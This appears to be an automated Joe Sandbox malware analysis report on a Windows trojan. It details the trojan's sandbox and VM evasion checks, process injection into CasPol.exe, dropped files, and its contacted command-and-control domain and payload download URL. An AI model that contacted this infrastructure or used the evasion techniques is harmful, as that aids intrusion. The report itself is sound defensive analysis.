Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B67E47 push esp; ret	1_2_02B67E56
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B677DB pushfd ; iretd	1_2_02B677DC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B630AF push FFFFFFE8h; iretd	1_2_02B630CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B640C9 push ecx; retf	1_2_02B640D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6405E push ecx; retf	1_2_02B640D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B64134 push ecx; retf	1_2_02B640D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60542 push ecx; iretd	1_2_02B605C3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_10001B18

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File created: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEIUX

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 6604	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4808	Thread sleep time: -220000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_02B60AA2 rdtsc

1_2_02B60AA2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: threadDelayed 544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: threadDelayed 1377	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Window / User API: foregroundWindowGot 1510	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_004065C5 FindFirstFileW,FindClose,	1_2_004065C5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405990
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_00402862 FindFirstFileW,	1_2_00402862

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	API call chain: ExitProcess graph end node			graph_1-13697
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	API call chain: ExitProcess graph end node			graph_1-13701

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeiux
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 0000000A.00000003.29542119343.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_10001B18

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_02B60AA2 rdtsc

1_2_02B60AA2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B80E92 mov eax, dword ptr fs:[00000030h]	1_2_02B80E92
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B82CB9 mov eax, dword ptr fs:[00000030h]	1_2_02B82CB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B69DC3 mov eax, dword ptr fs:[00000030h]	1_2_02B69DC3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_02B80EBA LdrLoadDll,

1_2_02B80EBA

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: 1100000

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Jump to behavior

Source: CasPol.exe, 0000000A.00000003.30403973152.000000001FCA7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.30302030860.000000001FCA7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29299424561.000000001FCA7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Program Manager.NET\Framework\v2.0.50727\en\SurveillanceExClientPlugin.resources\SurveillanceExClientPlugin.resources.EXE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_02B66C0A cpuid

1_2_02B66C0A

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

1_2_00403373

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	112 Process Injection	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	112 Process Injection	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	113 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Hidden Files and Directories	Cached Domain Credentials	15 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	7%	ReversingLabs	Win32.Downloader.Minix

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe	3%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll	4%	Metadefender	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mastersure042.duckdns.org	1%	Virustotal		Browse

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mastersure042.duckdns.org	91.193.75.140	true	true	1%, Virustotal, Browse	unknown
drive.google.com	142.250.186.78	true	false		high
googlehosted.l.googleusercontent.com	172.217.16.193	true	false		high
doc-10-90-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-10-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8du3ehjl7ongfpjedkiiajf5ov/1667456475000/09123801443977292633/*/1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr?e=download&uuid=caf5e569-6740-43bd-97a5-42b5521fedc0	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://doc-10-90-docs.googleusercontent.com/7	CasPol.exe, 0000000A.00000003.29241626102.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false	high
https://doc-10-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8d	CasPol.exe, 0000000A.00000003.29242029782.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29237253452.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29542976844.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29541952931.000000000149C000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	false	high
https://doc-10-90-docs.googleusercontent.com/	CasPol.exe, 0000000A.00000003.29241626102.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.193.75.140	mastersure042.duckdns.org	Serbia	209623	DAVID_CRAIGGG	true
142.250.186.78	drive.google.com	United States	15169	GOOGLEUS	false
172.217.16.193	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	736731
Start date and time:	2022-11-03 07:19:30 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winEXE@4/7@23/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 23.9% (good quality ratio 23.4%) Quality average: 87.9% Quality standard deviation: 21.6%
HCA Information:	Successful, ratio: 96% Number of executed functions: 62 Number of non-executed functions: 85
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
